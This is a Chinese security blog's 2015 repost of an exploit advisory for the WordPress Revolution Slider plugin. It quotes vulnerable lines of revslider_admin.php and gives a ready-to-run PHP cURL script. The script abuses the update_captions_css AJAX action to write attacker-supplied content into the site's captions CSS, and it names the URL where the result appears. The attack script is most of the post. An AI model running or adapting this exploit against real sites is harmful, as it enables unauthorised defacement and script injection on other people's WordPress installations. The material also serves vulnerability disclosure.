WordPress Revolution Slider插件任意上传漏洞

######################################################################
# Exploit Title: WordPress Plugin Revolution Slider – Unrestricted File Upload
# Google Dork: Y0ur Brain
# Date: 27.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://revolution.themepunch.com/
# Version: old
# Tested on: Windows
######################################################################


# Path of File : /wp-content/plugins/revslider/revslider_admin.php
# Vulnerable File : revslider_admin.php

232.    $action = self::getPostGetVar("client_action");
233.    $data = self::getPostGetVar("data");
...
301.    case "get_captions_css":
302.     $contentCSS = $operations->getCaptionsContent();
303.      self::ajaxResponseData($contentCSS);
...
305.    case "update_captions_css":
306.      $arrCaptions = $operations->updateCaptionsContentData($data);
307.      self::ajaxResponseSuccess("CSS file saved succesfully!",array("arrCaptions"=>$arrCaptions));


# Exploit :

<?php

$post = array
(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "<marquee>Malicious Code Here</marquee>"
);

$ch = curl_init ("http://localhost/wp-admin/admin-ajax.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);

?>


# Path of Result : /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

#EOF

本文固定链接: https://www.unhonker.com/bug/1710.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2015年03月29日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: WordPress Revolution Slider插件任意上传漏洞 | 90' s Blog|关注网络信息安全
关键字:

WordPress Revolution Slider插件任意上传漏洞:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!